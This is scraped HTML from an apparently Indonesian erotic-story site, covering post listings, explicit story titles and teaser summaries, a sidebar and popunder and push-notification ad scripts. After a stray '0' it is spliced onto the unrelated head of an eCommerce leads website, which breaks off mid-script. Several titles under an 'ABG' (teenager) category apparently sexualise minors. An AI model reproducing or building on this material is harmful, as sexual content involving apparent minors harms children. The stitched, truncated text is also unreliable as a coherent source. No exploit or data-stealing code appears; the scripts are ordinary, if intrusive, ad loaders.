href="https://doephotog.com/cerita-sex-atasanku-yang-biasa-berwibawa-dikantor-kini-mendesah-dibawah-selangkanganku/#respond" title="Leave a comment on: &ldquo;Cerita Sex Atasanku Yang Biasa Berwibawa Dikantor, Kini Mendesah Dibawah Selangkanganku&rdquo;" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> <div class="post-summary"> Cerita panas ? Kehidupan itu ada pasang surutnya, ketika saya sedang jaya, saya mempunyai client yang lumayan&hellip; </div> </div> </article > <article class="post-1292 type-post format-standard has-post-thumbnail listing-item listing-item-tall listing-item-tall-2 main-term-4"> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-4"><a href="https://doephotog.com/category/cerita-sex-selingkuh/">Cerita Sex Selingkuh</a></span></div> <a title="Cerita Sex Desahan Nikmat Murni Saat Orgasme" data-src="https://doephotog.com/wp-content/uploads/2019/02/CeritaSex107-368x445.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2019\/02\/&quot;,&quot;sizes&quot;:{&quot;180&quot;:&quot;CeritaSex107-180x217.jpg&quot;,&quot;267&quot;:&quot;CeritaSex107-267x322.jpg&quot;,&quot;368&quot;:&quot;CeritaSex107-368x445.jpg&quot;,&quot;640&quot;:&quot;CeritaSex107.jpg&quot;}}" class="img-holder" href="https://doephotog.com/cerita-sex-desahan-nikmat-murni-saat-orgasme/"></a> </div> <h2 class="title"> <a href="https://doephotog.com/cerita-sex-desahan-nikmat-murni-saat-orgasme/" class="post-title post-url"> Cerita Sex Desahan Nikmat Murni Saat Orgasme </a> </h2> <div class="post-meta"> <a href="https://doephotog.com/author/gukubiquitous/" title="Browse Author Articles" class="post-author-a"> <i class="post-author author"> gukubiquitous </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-08T10:09:39+00:00">May 8, 2019</time></span> <a href="https://doephotog.com/cerita-sex-desahan-nikmat-murni-saat-orgasme/#respond" title="Leave a comment on: &ldquo;Cerita Sex Desahan Nikmat Murni Saat Orgasme&rdquo;" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> <div class="post-summary"> Aqu pernah kost disebuah rumah mewah di Makassar, pemilik rumah tergolong elite dan termasuk sibuk dgn&hellip; </div> </div> </article > </div> <div class="pagination bs-numbered-pagination" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement/Pagination"><span aria-current='page' class='page-numbers current'>1</span> <a class='page-numbers' href='https://doephotog.com/page/2/'>2</a> <a class='page-numbers' href='https://doephotog.com/page/3/'>3</a> <span class="page-numbers dots">&hellip;</span> <a class='page-numbers' href='https://doephotog.com/page/31/'>31</a> <a class="next page-numbers" href="https://doephotog.com/page/2/">Next <i class="fa fa-angle-right"></i></a></div> </div><!-- .content-column --> <div class="col-sm-4 sidebar-column sidebar-column-primary"> <aside id="sidebar-primary-sidebar" class="sidebar" role="complementary" aria-label="Primary Sidebar Sidebar" itemscope="itemscope" itemtype="https://schema.org/WPSideBar"> <div id="search-2" class=" h-ni w-nt primary-sidebar-widget widget widget_search"><form role="search" method="get" class="search-form clearfix" action="https://doephotog.com"> <input type="search" class="search-field" placeholder="Search..." value="" name="s" title="Search for:" autocomplete="off"> <input type="submit" class="search-submit" value="Search"> </form><!-- .search-form --> </div><div id="custom_html-2" class="widget_text h-ni w-nt primary-sidebar-widget widget widget_custom_html"><div class="textwidget custom-html-widget"> <!-- Histats.com START (aync)--> <script type="text/javascript">var _Hasync= _Hasync|| []; _Hasync.push(['Histats.start', '1,4002370,4,0,0,0,00010000']); _Hasync.push(['Histats.fasi', '1']); _Hasync.push(['Histats.track_hits', '']); (function() { var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true; hs.src = ('//s10.histats.com/js15_as.js'); (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs); })();</script> <noscript><a href="/" target="_blank"><img src="//sstatic1.histats.com/0.gif?4002370&101" alt="best counter" border="0"></a></noscript> <!-- Histats.com END --> </div></div> <div id="recent-posts-6" class=" h-ni w-nt primary-sidebar-widget widget widget_recent_entries"> <div class="section-heading sh-t1 sh-s1"><span class="h-text">Recent Posts</span></div> <ul> <li> <a href="https://doephotog.com/cerita-sex-goyangan-maut-tante-dona-sangat-dasyat/">Cerita Sex Goyangan Maut Tante Dona Sangat Dasyat</a> </li> <li> <a href="https://doephotog.com/cerita-sex-cerita-istri-ml-dadakan-dengan-pegawai-pln/">Cerita Sex Cerita Istri ML Dadakan Dengan Pegawai PLN</a> </li> <li> <a href="https://doephotog.com/cerita-sex-cerita-dewasa-bergambar-meki-legit-perawan-berjilbab/">Cerita Sex Cerita Dewasa Bergambar Meki Legit Perawan Berjilbab</a> </li> <li> <a href="https://doephotog.com/cerita-sex-cerita-porno-hot-memek-eva-berdenyut/">Cerita Sex Cerita Porno Hot Memek Eva Berdenyut</a> </li> <li> <a href="https://doephotog.com/cerita-sex-sex-sempitnya-memek-perawan-reni/">Cerita Sex Sex Sempitnya Memek Perawan Reni</a> </li> </ul> </div><div id="text-6" class=" h-ni w-nt primary-sidebar-widget widget widget_text"> <div class="textwidget"><p><script type="text/javascript"> var ad_idzone = "3246932", ad_width = "300", ad_height = "250"; </script><br /> <script type="text/javascript" src="https://ads.exosrv.com/ads.js"></script><br /> <noscript><iframe src="https://syndication.exosrv.com/ads-iframe-display.php?idzone=3246932&#038;output=noscript&#038;type=300x250" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe></noscript></p> </div> </div><div id="bs-social-share-2" class=" h-ni w-t primary-sidebar-widget widget widget_bs-social-share"><div class="section-heading sh-t1 sh-s1"><span class="h-text">Share</span></div> <div class="bs-shortcode bs-social-share style-button colored"> <ul class="bs-button-list social-list clearfix"><span class="social-item facebook has-title"><a href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fdoephotog.com%2F" target="_blank" rel="nofollow" class="bs-button-el" onclick="window.open(this.href, 'share-facebook','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-facebook"></i></span><span class="item-title">Facebook</span></a></span><span class="social-item twitter has-title"><a href="https://twitter.com/share?text=Cerita+Dewasa&url=https%3A%2F%2Fdoephotog.com%2F" target="_blank" rel="nofollow" class="bs-button-el" onclick="window.open(this.href, 'share-twitter','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-twitter"></i></span><span class="item-title">Twitter</span></a></span><span class="social-item google_plus has-title"><a href="https://plus.google.com/share?url=https%3A%2F%2Fdoephotog.com%2F" target="_blank" rel="nofollow" class="bs-button-el" onclick="window.open(this.href, 'share-google_plus','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-google"></i></span><span class="item-title">Google+</span></a></span><span class="social-item reddit has-title"><a href="https://reddit.com/submit?url=https%3A%2F%2Fdoephotog.com%2F&title=Cerita+Dewasa" target="_blank" rel="nofollow" class="bs-button-el" onclick="window.open(this.href, 'share-reddit','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-reddit-alien"></i></span><span class="item-title">ReddIt</span></a></span><span class="social-item whatsapp has-title"><a href="whatsapp://send?text=Cerita+Dewasa %0A%0A https%3A%2F%2Fdoephotog.com%2F" target="_blank" rel="nofollow" class="bs-button-el" onclick="window.open(this.href, 'share-whatsapp','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-whatsapp"></i></span><span class="item-title">WhatsApp</span></a></span><span class="social-item pinterest has-title"><a href="https://pinterest.com/pin/create/button/?url=https%3A%2F%2Fdoephotog.com%2F&media=https://doephotog.com/wp-content/uploads/2019/02/CeritaSex107.jpg&description=Cerita+Dewasa" target="_blank" rel="nofollow" class="bs-button-el" onclick="window.open(this.href, 'share-pinterest','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-pinterest"></i></span><span class="item-title">Pinterest</span></a></span><span class="social-item email has-title"><a href="mailto:?subject=Cerita+Dewasa&body=https%3A%2F%2Fdoephotog.com%2F" target="_blank" rel="nofollow" class="bs-button-el" onclick="window.open(this.href, 'share-email','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-envelope-open"></i></span><span class="item-title">Email</span></a></span> </ul><!-- .social-list --> </div><!-- .bs-social-share --> </div><div id="bs-mix-listing-3-4-2" class=" h-ni w-nt primary-sidebar-widget widget widget_bs-mix-listing-3-4"><div class=" bs-listing bs-listing-listing-mix-3-4 bs-listing-single-tab"> <p class="section-heading sh-t1 sh-s1 main-term-4"> <a href="https://doephotog.com/category/cerita-sex-selingkuh/" class="main-link"> <span class="h-text main-term-4"> Cerita Sex Selingkuh </span> </a> </p> <div class="listing listing-mix-3-4 clearfix "> <div class="item-inner"> <div class="row-1"> <div class="listing listing-modern-grid listing-modern-grid-3 clearfix columns-1 slider-overlay-simple-gr"> <div class="post-1272 type-post format-standard has-post-thumbnail listing-item-1 listing-item listing-mg-item listing-mg-3-item main-term-4 bsw-300"> <div class="item-content"> <a title="Cerita Sex Goyangan Maut Tante Dona Sangat Dasyat" data-src="https://doephotog.com/wp-content/uploads/2019/02/CeritaSex102-640x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2019\/02\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;CeritaSex102-210x136.jpg&quot;,&quot;279&quot;:&quot;CeritaSex102-279x220.jpg&quot;,&quot;357&quot;:&quot;CeritaSex102-357x210.jpg&quot;,&quot;640&quot;:&quot;CeritaSex102.jpg&quot;}}" class="img-cont" href="https://doephotog.com/cerita-sex-goyangan-maut-tante-dona-sangat-dasyat/"></a> <div class="content-container"> <div class="term-badges floated"><span class="term-badge term-4"><a href="https://doephotog.com/category/cerita-sex-selingkuh/">Cerita Sex Selingkuh</a></span></div><p class="title"> <a href="https://doephotog.com/cerita-sex-goyangan-maut-tante-dona-sangat-dasyat/" class="post-title post-url"> Cerita Sex Goyangan Maut Tante Dona Sangat Dasyat </a> </p> <div class="post-meta"> <a href="https://doephotog.com/author/gukubiquitous/" title="Browse Author Articles" class="post-author-a"> <i class="post-author author"> gukubiquitous </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-15T05:56:24+00:00">May 15, 2019</time></span> <a href="https://doephotog.com/cerita-sex-goyangan-maut-tante-dona-sangat-dasyat/#respond" title="Leave a comment on: &ldquo;Cerita Sex Goyangan Maut Tante Dona Sangat Dasyat&rdquo;" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> </div> </div> </div > </div> </div> <div class="row-2"> <div class="listing listing-thumbnail listing-tb-1 clearfix columns-1"> <div class="post-986 type-post format-standard has-post-thumbnail listing-item-1 listing-item listing-item-thumbnail listing-item-tb-1 main-term-4"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a title="Cerita Sex Cerita Istri ML Dadakan Dengan Pegawai PLN" data-src="https://doephotog.com/wp-content/uploads/2019/02/CeritaSex083-86x64.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2019\/02\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;CeritaSex083-86x64.jpg&quot;,&quot;210&quot;:&quot;CeritaSex083-210x136.jpg&quot;,&quot;600&quot;:&quot;CeritaSex083.jpg&quot;}}" class="img-holder" href="https://doephotog.com/cerita-sex-cerita-istri-ml-dadakan-dengan-pegawai-pln/"></a> </div> <p class="title"> <a href="https://doephotog.com/cerita-sex-cerita-istri-ml-dadakan-dengan-pegawai-pln/" class="post-url post-title"> Cerita Sex Cerita Istri ML Dadakan Dengan Pegawai PLN </a> </p> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2019-05-12T16:50:55+00:00">May 12, 2019</time></span> </div> </div> </div > <div class="post-1433 type-post format-standard has-post-thumbnail listing-item-1 listing-item listing-item-thumbnail listing-item-tb-1 main-term-4"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a title="Cerita Sex Cerita Dewasa Bergambar Meki Legit Perawan Berjilbab" data-src="https://doephotog.com/wp-content/uploads/2019/02/CeritaSex017-86x64.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2019\/02\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;CeritaSex017-86x64.jpg&quot;,&quot;210&quot;:&quot;CeritaSex017-210x136.jpg&quot;,&quot;564&quot;:&quot;CeritaSex017.jpg&quot;}}" class="img-holder" href="https://doephotog.com/cerita-sex-cerita-dewasa-bergambar-meki-legit-perawan-berjilbab/"></a> </div> <p class="title"> <a href="https://doephotog.com/cerita-sex-cerita-dewasa-bergambar-meki-legit-perawan-berjilbab/" class="post-url post-title"> Cerita Sex Cerita Dewasa Bergambar Meki Legit Perawan Berjilbab </a> </p> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2019-05-12T08:37:10+00:00">May 12, 2019</time></span> </div> </div> </div > <div class="post-890 type-post format-standard has-post-thumbnail listing-item-1 listing-item listing-item-thumbnail listing-item-tb-1 main-term-4"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a title="Cerita Sex Cerita Porno Hot Memek Eva Berdenyut" data-src="https://doephotog.com/wp-content/uploads/2019/02/CeritaSex024-86x64.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2019\/02\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;CeritaSex024-86x64.jpg&quot;,&quot;210&quot;:&quot;CeritaSex024-210x136.jpg&quot;,&quot;867&quot;:&quot;CeritaSex024.jpg&quot;}}" class="img-holder" href="https://doephotog.com/cerita-sex-cerita-porno-hot-memek-eva-berdenyut/"></a> </div> <p class="title"> <a href="https://doephotog.com/cerita-sex-cerita-porno-hot-memek-eva-berdenyut/" class="post-url post-title"> Cerita Sex Cerita Porno Hot Memek Eva Berdenyut </a> </p> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2019-05-12T00:49:16+00:00">May 12, 2019</time></span> </div> </div> </div > </div> </div> </div> </div> </div></div><div id="bs-mix-listing-3-1-2" class=" h-ni w-nt primary-sidebar-widget widget widget_bs-mix-listing-3-1"><div class=" bs-listing bs-listing-listing-mix-3-1 bs-listing-single-tab"> <p class="section-heading sh-t1 sh-s1 main-term-9"> <a href="https://doephotog.com/category/cerita-sex-abg/" class="main-link"> <span class="h-text main-term-9"> Cerita Sex ABG </span> </a> </p> <div class="listing listing-mix-3-1 clearfix "> <div class="item-inner"> <div class="row-1"> <div class="listing listing-grid-1 clearfix columns-1"> <div class="post-605 type-post format-standard has-post-thumbnail listing-item listing-item-grid listing-item-grid-1 main-term-9"> <div class="item-inner"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-9"><a href="https://doephotog.com/category/cerita-sex-abg/">Cerita Sex ABG</a></span></div> <a alt="Aku yang memuaskan Tante Dewi" title="Cerita Sex Baby Sister Putih Mulus" data-src="https://doephotog.com/wp-content/uploads/2018/02/2.jpg" class="img-holder" href="https://doephotog.com/cerita-sex-baby-sister-putih-mulus/"></a> </div> <p class="title"> <a href="https://doephotog.com/cerita-sex-baby-sister-putih-mulus/" class="post-title post-url"> Cerita Sex Baby Sister Putih Mulus </a> </p> <div class="post-meta"> <a href="https://doephotog.com/author/gukubiquitous/" title="Browse Author Articles" class="post-author-a"> <i class="post-author author"> gukubiquitous </i> </a> <span class="time"><time class="post-published updated" datetime="2019-01-25T09:52:44+00:00">Jan 25, 2019</time></span> </div> <div class="post-summary"> Aku adalah seorang anak yang dilahirkan dari keluarga yang mampu di mana papaku sibuk dengan urusan kantornya&hellip; </div> </div> </div > </div> </div> <div class="row-2"> <div class="listing listing-thumbnail listing-tb-1 clearfix columns-1"> <div class="post-602 type-post format-standard has-post-thumbnail listing-item listing-item-thumbnail listing-item-tb-1 main-term-9"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a alt="ABG Ngentot Ketika PKL Di Hotel" title="ABG Ngentot Ketika Magang Di Hotel" data-src="https://doephotog.com/wp-content/uploads/2019/01/ABG-Ngentot-Ketika-PKL-Di-Hotel-86x64.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2019\/01\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;ABG-Ngentot-Ketika-PKL-Di-Hotel-86x64.jpg&quot;,&quot;210&quot;:&quot;ABG-Ngentot-Ketika-PKL-Di-Hotel-210x136.jpg&quot;,&quot;300&quot;:&quot;ABG-Ngentot-Ketika-PKL-Di-Hotel.jpg&quot;}}" class="img-holder" href="https://doephotog.com/abg-ngentot-ketika-magang-di-hotel/"></a> </div> <p class="title"> <a href="https://doephotog.com/abg-ngentot-ketika-magang-di-hotel/" class="post-url post-title"> ABG Ngentot Ketika Magang Di Hotel </a> </p> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2019-01-23T10:17:23+00:00">Jan 23, 2019</time></span> </div> </div> </div > <div class="post-593 type-post format-standard has-post-thumbnail listing-item listing-item-thumbnail listing-item-tb-1 main-term-9"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a alt="Februari saat kehilangan perawanku" title="Februari saat kehilangan perawanku" data-src="https://doephotog.com/wp-content/uploads/2018/08/9-86x64.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2018\/08\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;9-86x64.jpg&quot;,&quot;210&quot;:&quot;9-210x136.jpg&quot;,&quot;481&quot;:&quot;9.jpg&quot;}}" class="img-holder" href="https://doephotog.com/februari-saat-kehilangan-perawanku/"></a> </div> <p class="title"> <a href="https://doephotog.com/februari-saat-kehilangan-perawanku/" class="post-url post-title"> Februari saat kehilangan perawanku </a> </p> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2018-08-12T21:41:55+00:00">Aug 12, 2018</time></span> </div> </div> </div > <div class="post-590 type-post format-standard has-post-thumbnail listing-item listing-item-thumbnail listing-item-tb-1 main-term-9"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a alt="Diriku dikuasai nafsu" title="Diriku dikuasai nafsu" data-src="https://doephotog.com/wp-content/uploads/2018/08/8-86x64.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2018\/08\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;8-86x64.jpg&quot;,&quot;210&quot;:&quot;8-210x136.jpg&quot;,&quot;500&quot;:&quot;8.jpg&quot;}}" class="img-holder" href="https://doephotog.com/diriku-dikuasai-nafsu/"></a> </div> <p class="title"> <a href="https://doephotog.com/diriku-dikuasai-nafsu/" class="post-url post-title"> Diriku dikuasai nafsu </a> </p> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2018-08-12T21:37:05+00:00">Aug 12, 2018</time></span> </div> </div> </div > </div> </div> </div> </div> </div></div></aside> </div><!-- .primary-sidebar-column --> </div><!-- .main-section --> </div> </main><!-- main --> </div><!-- .content-wrap --> <div class="container adcontainer"><div class="bsac bsac-clearfix adloc-before-footer adloc-is-banner adloc-show-desktop adloc-show-tablet-portrait adloc-show-tablet-landscape adloc-show-phone location-footer_before bsac-align-center bsac-column-1"><div id="bsac-608-1945205017" class="bsac-container bsac-type-custom_code " itemscope="" itemtype="https://schema.org/WPAdBlock" data-adid="608" data-type="custom_code"><script type="text/javascript"> var ad_idzone = "3269658", ad_width = "900", ad_height = "250"; </script> <script type="text/javascript" src="https://ads.exosrv.com/ads.js"></script> <noscript><iframe src="https://syndication.exosrv.com/ads-iframe-display.php?idzone=3269658&output=noscript&type=900x250" width="900" height="250" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe></noscript></div></div></div> <footer id="site-footer" class="site-footer full-width"> <div class="copy-footer"> <div class="content-wrap"> <div class="container"> <div class="row footer-copy-row"> <div class="copy-1 col-lg-6 col-md-6 col-sm-6 col-xs-12"> © 2019 - Cerita Dewasa. All Rights Reserved. </div> <div class="copy-2 col-lg-6 col-md-6 col-sm-6 col-xs-12"> </div> </div> </div> </div> </div> </footer><!-- .footer --> </div><!-- .main-wrap --> <span class="back-top"><i class="fa fa-arrow-up"></i></span> <script type="text/javascript"> pn_idzone = 3246942; pn_sleep_seconds = 20; pn_is_self_hosted = 1; pn_soft_ask = 0; pn_filename = "/worker.js"; </script> <script type="text/javascript" src="https://js.wpncdn.com/pn.php"></script> <script type="text/javascript"> var ad_idzone = "3246954", ad_popup_fallback = true, ad_popup_force = false, ad_new_tab = false, ad_frequency_period = 720, ad_frequency_count = 1, ad_trigger_method = 1; </script> <script type="text/javascript" src="https://ads.exosrv.com/popunder1000.js"></script> <script type='text/javascript'> /* <![CDATA[ */ var bs_pagination_loc = {"loading":"<div class=\"bs-loading\"><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><\/div>"}; /* ]]> */ </script> <script type='text/javascript'> /* <![CDATA[ */ var better_bam_loc = {"ajax_url":"https:\/\/doephotog.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript'> /* <![CDATA[ */ var publisher_theme_global_loc = {"page":{"boxed":"boxed"},"header":{"style":"style-2","boxed":"boxed"},"ajax_url":"https:\/\/doephotog.com\/wp-admin\/admin-ajax.php","loading":"<div class=\"bs-loading\"><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><\/div>","translations":{"tabs_all":"All","tabs_more":"More","lightbox_expand":"Expand the image","lightbox_close":"Close"},"lightbox":{"not_classes":""},"main_menu":{"more_menu":"enable"},"skyscraper":{"sticky_gap":30,"sticky":true,"position":"after-header"},"share":{"more":true},"refresh_googletagads":"1","notification":{"subscribe_msg":"By clicking the subscribe button you will never miss the new articles!","subscribed_msg":"You're subscribed to notifications","subscribe_btn":"Subscribe","subscribed_btn":"Unsubscribe"}}; var publisher_theme_ajax_search_loc = {"ajax_url":"https:\/\/doephotog.com\/wp-admin\/admin-ajax.php","previewMarkup":"<div class=\"ajax-search-results-wrapper ajax-search-no-product ajax-search-fullwidth\">\n\t<div class=\"ajax-search-results\">\n\t\t<div class=\"ajax-ajax-posts-list\">\n\t\t\t<div class=\"clean-title heading-typo\">\n\t\t\t\t<span>Posts<\/span>\n\t\t\t<\/div>\n\t\t\t<div class=\"posts-lists\" data-section-name=\"posts\"><\/div>\n\t\t<\/div>\n\t\t<div class=\"ajax-taxonomy-list\">\n\t\t\t<div class=\"ajax-categories-columns\">\n\t\t\t\t<div class=\"clean-title heading-typo\">\n\t\t\t\t\t<span>Categories<\/span>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"posts-lists\" data-section-name=\"categories\"><\/div>\n\t\t\t<\/div>\n\t\t\t<div class=\"ajax-tags-columns\">\n\t\t\t\t<div class=\"clean-title heading-typo\">\n\t\t\t\t\t<span>Tags<\/span>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"posts-lists\" data-section-name=\"tags\"><\/div>\n\t\t\t<\/div>\n\t\t<\/div>\n\t<\/div>\n<\/div>","full_width":"1"}; /* ]]> */ </script> <!--[if lt IE 9]> <script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/ace/1.2.8/ext-old_ie.js'></script> <![endif]--> <div class="rh-cover noscroll no-login-icon" style="background-color: #000000"> <span class="rh-close"></span> <div class="rh-panel rh-pm"> <div class="rh-p-h"> </div> <div class="rh-p-b"> <div class="rh-c-m clearfix"></div> <form role="search" method="get" class="search-form" action="https://doephotog.com"> <input type="search" class="search-field" placeholder="Search..." value="" name="s" title="Search for:" autocomplete="off"> </form> </div> </div> </div> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/doephotog.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='https://doephotog.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='https://doephotog.com/wp-content/plugins/easy-image-display/js/jquery.colorbox-min.js?ver=4.9.10'></script> <script type='text/javascript' src='https://doephotog.com/wp-includes/js/wp-embed.min.js?ver=4.9.10'></script> <script type='text/javascript' src='https://doephotog.com/wp-content/plugins/better-adsmanager/js/advertising.min.js?ver=1.16.6'></script> <script type='text/javascript' async="async" src='https://doephotog.com/wp-content/bs-booster-cache/f98ee52e221c60208b1f70d2010a9bc6.js?ver=4.9.10'></script> </body> </html><!-- WP Fastest Cache file was created in 0.31712698936462 seconds, on 16-05-19 13:45:33 -->
0
<!DOCTYPE html> <html class="no-js" lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="pingback" href="https://etailinsights.com/xmlrpc.php"> <title>eCommerce Leads | Directory of Online Retailers | eCommerce Sales Leads</title> <!-- This site is optimized with the Yoast SEO plugin v11.0 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="etailinsights is an industry leader in procuring eCommerce Leads. Our Directory of Online Retailers provides you eCommerce Sales Leads with email addresses."/> <link rel="canonical" href="https://etailinsights.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="eCommerce Leads | Directory of Online Retailers | eCommerce Sales Leads" /> <meta property="og:description" content="etailinsights is an industry leader in procuring eCommerce Leads. Our Directory of Online Retailers provides you eCommerce Sales Leads with email addresses." /> <meta property="og:url" content="https://etailinsights.com/" /> <meta property="og:site_name" content="etailinsights" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="etailinsights is an industry leader in procuring eCommerce Leads. Our Directory of Online Retailers provides you eCommerce Sales Leads with email addresses." /> <meta name="twitter:title" content="eCommerce Leads | Directory of Online Retailers | eCommerce Sales Leads" /> <meta name="twitter:site" content="@etailinsights" /> <meta name="twitter:creator" content="@etailinsights" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://etailinsights.com/#organization","name":"etailinsights","url":"https://etailinsights.com/","sameAs":["https://www.facebook.com/etailinsights/","https://www.linkedin.com/company/etailinsights","https://www.youtube.com/user/etailinsights","https://twitter.com/etailinsights"],"logo":{"@type":"ImageObject","@id":"https://etailinsights.com/#logo","url":"https://etailinsights.com/wp-content/uploads/2016/01/Screen-Shot-2015-12-22-at-9.48.37-PM.png","caption":"etailinsights"},"image":{"@id":"https://etailinsights.com/#logo"}},{"@type":"WebSite","@id":"https://etailinsights.com/#website","url":"https://etailinsights.com/","name":"etailinsights","publisher":{"@id":"https://etailinsights.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://etailinsights.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://etailinsights.com/#webpage","url":"https://etailinsights.com/","inLanguage":"en-US","name":"eCommerce Leads | Directory of Online Retailers | eCommerce Sales Leads","isPartOf":{"@id":"https://etailinsights.com/#website"},"about":{"@id":"https://etailinsights.com/#organization"},"datePublished":"2017-10-30T17:05:54+00:00","dateModified":"2018-07-21T10:03:46+00:00","description":"etailinsights is an industry leader in procuring eCommerce Leads. Our Directory of Online Retailers provides you eCommerce Sales Leads with email addresses."}]}</script> <!-- / Yoast SEO plugin. --> <script type='text/javascript'>console.log('PixelYourSite Free version 7.0.2');</script> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="etailinsights &raquo; Feed" href="https://etailinsights.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="etailinsights &raquo; Comments Feed" href="https://etailinsights.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/etailinsights.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var 